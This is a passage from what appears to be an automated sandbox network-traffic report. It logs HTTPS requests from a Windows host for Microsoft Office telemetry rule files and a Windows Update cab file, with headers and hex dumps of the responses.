                                                                                                                                                                                  2024-11-23 18:53:16 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  126192.168.2.74988313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:16 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:16 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1364
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                  x-ms-request-id: 38badaf1-c01e-00ad-2128-3da2b9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185316Z-178bfbc474bw8bwphC1NYC38b400000004n000000000hhgq
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:16 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  127192.168.2.7498734.175.87.197443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:17 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uOAVrAAkXHMSHAx&MD=G22mkc+C HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                                                                                  2024-11-23 18:53:17 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                  MS-CorrelationId: ab857d77-7cb6-4c23-89b6-48d08d978e36
                                                                                                                                                                                  MS-RequestId: a4e0d8a5-6bc6-432e-81e2-86f0cd8a57cb
                                                                                                                                                                                  MS-CV: InJsNNiJuUyyfBk9.0
                                                                                                                                                                                  X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:17 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 30005
                                                                                                                                                                                  2024-11-23 18:53:17 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                  2024-11-23 18:53:18 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  128192.168.2.74990413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:18 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:18 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1366
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                  x-ms-request-id: ccc9fd57-201e-0096-041b-3dace6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185318Z-178bfbc474btvfdfhC1NYCa2en00000004yg000000008afu
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:18 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  129192.168.2.74991113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:18 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:19 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1403
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                  x-ms-request-id: 18ec886b-801e-0078-7044-3cbac6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185319Z-178bfbc474b9xljthC1NYCtw9400000004r000000000h566
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:19 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  130192.168.2.74990913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:18 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:19 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:19 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1399
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                  x-ms-request-id: 34c66101-001e-0065-5256-3d0b73000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185319Z-15b8b599d88hd9g7hC1TEBp75c00000003cg000000002k9b
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:19 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  131192.168.2.74991013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:18 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:19 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDF497570"
                                                                                                                                                                                  x-ms-request-id: ff0b0d52-c01e-002b-2681-3b6e00000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185319Z-174c587ffdfb74xqhC1TEBhabc000000039000000000gaet
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:19 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  132192.168.2.74991213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:18 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:19 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1366
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                  x-ms-request-id: 25bf86e9-c01e-007a-2c4f-3cb877000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185319Z-15b8b599d885ffrhhC1TEBtuv000000003ag00000000g3b3
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:19 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  133192.168.2.74992413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:20 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:21 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1399
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                  x-ms-request-id: 734d7ed2-001e-002b-08e4-3c99f2000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185321Z-178bfbc474bh5zbqhC1NYCkdug00000004t000000000b2yc
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:21 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  134192.168.2.74993013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:21 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:21 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1366
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                  x-ms-request-id: 4f172bc4-201e-006e-1d27-3dbbe3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185321Z-15b8b599d889fz52hC1TEB59as000000037g00000000gx2r
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
